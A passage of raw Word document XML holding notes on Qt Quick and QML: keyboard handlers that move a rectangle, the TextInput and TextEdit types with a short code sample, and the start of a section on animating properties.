          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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id</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root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width</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320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height</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480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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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width</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320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height</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480</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="00D72F99"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48415B" w:rsidRPr="00D72F99"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48415B" w:rsidRPr="00D72F99"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Rectangle</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48415B" w:rsidRPr="00D72F99"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id</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rectangle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="00D72F99"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x</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40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y</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20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width</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120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height</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120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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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focus</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</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onUpPressed</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rectangle</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y </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10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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</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onDownPressed</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rectangle</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y </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10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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</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onLeftPressed</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rectangle</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x </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10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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keys</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onRightPressed</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rectangle</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x </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10</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w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text input</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId489" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides several built-in types. In particular, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId490" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId491" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextEdit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single-line entry</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multi-line editing</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is all you need to get a working</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId492" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextInput</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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focus</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415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48415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    text</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Initial Text"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="002B6E64" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6E64">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="002B6E64" w:rsidRDefault="0048415B" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="002B6E64" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId493" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="002B6E64">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-animations.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="_Toc483000665"/>
      <w:bookmarkStart w:id="635" w:name="_Toc483003682"/>
      <w:bookmarkStart w:id="636" w:name="_Toc483604018"/>
      <w:bookmarkStart w:id="637" w:name="_Toc483605238"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use case - Animations In QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="634"/>
      <w:bookmarkEnd w:id="635"/>
      <w:bookmarkEnd w:id="636"/>
      <w:bookmarkEnd w:id="637"/>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00490E7E" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId494" w:history="1">
        <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provides the </w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ability to animate properties</w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Animating properties allows property values to </w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>move through intermediate values</w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of immediately changing to the target value. To animate the position of an item, you can animate the properties that control the item's position, x and y for example, so that the item's position </w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes each frame</w:t>
      </w:r>
      <w:r w:rsidR="00D72F99" w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the way to the target position.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00EF38D8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="fluid-uis"/>
      <w:bookmarkStart w:id="639" w:name="_Toc483000666"/>
      <w:bookmarkStart w:id="640" w:name="_Toc483003683"/>
      <w:bookmarkStart w:id="641" w:name="_Toc483604019"/>
      <w:bookmarkStart w:id="642" w:name="_Toc483605239"/>
      <w:bookmarkEnd w:id="638"/>
      <w:r w:rsidRPr="00EF38D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fluid UIs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
      <w:bookmarkEnd w:id="640"/>
      <w:bookmarkEnd w:id="641"/>
      <w:bookmarkEnd w:id="642"/>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
